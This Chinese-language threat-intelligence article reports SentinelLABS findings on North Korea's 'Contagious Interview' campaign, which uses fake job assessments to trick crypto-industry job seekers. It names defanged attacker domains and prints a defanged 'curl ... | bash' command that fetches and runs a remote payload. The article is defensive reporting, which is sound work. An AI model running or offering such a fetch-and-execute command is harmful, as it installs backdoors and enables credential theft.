过去一年，网络安全研究人员发现，朝鲜威胁行为者的活动呈激增态势 —— 他们利用军方级别的社会工程学技术，将目标锁定在加密货币行业的专业人士身上。 这场名为 “Contagious Interview（传染性面试）” 的攻击活动，采用了看似无害的求职申请流程，以此伪装复杂恶意软件的交付过程。 受害者会收到虚假公司发出的 “模拟评估邀请”，以为是应聘相关岗位的考核环节，最终却被诱骗执行恶意脚本。 攻击者拥有庞大的基础设施网络，会迅速替换被查封的域名和服务器，以躲避封禁、维持高频度的攻击接触。

2025 年初，攻击者开始注册诸如 skillquestions [.] com、talentcheck [.] pro 等域名，搭建钓鱼网站 —— 这些网站会诱导求职者以 “排查错误” 为由在终端中运行 shell 命令。

在评估过程中，页面会弹出伪造的错误提示（通常是摄像头访问请求），引导受害者在终端中粘贴 curl 命令。

这一简单的载荷下载步骤会迅速升级为全面攻陷：恶意软件会建立持久化访问权限，并窃取凭证信息。

这些步骤的精心策划，再加上定制化的域名，使得短短三个月内，已确认的受害者接触量超过 230 次。

SentinelLABS（ SentinelOne 旗下实验室）的分析师指出，这些攻击活动的支撑，是对 Validin、VirusTotal 等威胁情报平台的持续监控。

当新的入侵指标（IOC）在 Maltrail 的 apt_lazarus [.] txt 等数据库中发布后，攻击者会立即注册社区账号，从而掌握自身基础设施暴露情况的最新信息。

他们不会投入精力对现有资产进行全面修改，而是在某个域名遭遇封禁时，直接搭建全新的服务器。

这种战略选择更看重运营灵活性，而非 “堡垒式” 防御，能让威胁行为者始终领先于封禁请求一步。

SentinelLABS 的研究人员发现，其基础设施的替换周期以 “小时” 为单位，而非 “周”。

当服务提供商封禁某个域名后，威胁行为者会立即配置新域名、迁移恶意软件分发服务器，并更新命令与控制（C2）端点。 （“liambrooksman” 伪装身份（邮箱：brooksliam534 [@]gmail.com），经追踪为 cors-app 与 cors-parser 项目的维护者（来源：SentinelOne）） 在幕后，攻击者通过 Slack 等团队协作平台进行协调：自动化机器人会发布新域名摘要，各操作人员则快速点击浏览这些预览信息。

感染机制

“Contagious Interview” 攻击活动的核心，是一套极简却高效的感染机制。

受害者访问钓鱼网站后，会看到一个由 JavaScript 驱动的表单，该表单模拟 “实时编程评估” 场景。

当受害者触发伪造的错误提示时，页面会显示一条终端命令：

bash

curl -s https[:]//api[.]drive-release[.]cloud/update[.]sh | bash

执行该命令后，会获取一个 shell 脚本 —— 该脚本会先进行环境检测、识别受害者的操作系统，再下载定制化的攻击载荷。

随后，脚本会安装轻量级后门、写入 cron 任务以实现持久化，并通过 HTTPS 与攻击者控制的 C2 服务器通信，完成受攻陷主机的注册。

攻击的所有阶段，都会被服务器上的 ContagiousDrop Node.js 应用记录日志，并生成 client_ips_start_test [.] json 等 JSON 格式文件，其中包含详细的受害者信息记录。 （日志记录至 client_ips_start_test [.] json 文件（来源：SentinelOne））

这种 “社会工程学 + 自动化脚本” 的组合，在最大化感染率的同时，将攻击者的操作成本降至最低，也体现出朝鲜（DPRK）攻击能力的成熟。

凭借这些适应性战术 —— 基础设施快速迭代、情报驱动的资产探查、精简的载荷交付流程 —— 朝鲜威胁行为者持续构成动态且持久的威胁。

随着防御方不断强化检测协议，理解这一感染机制，对于在攻击链的 “初始接触” 阶段前将其阻断，至关重要。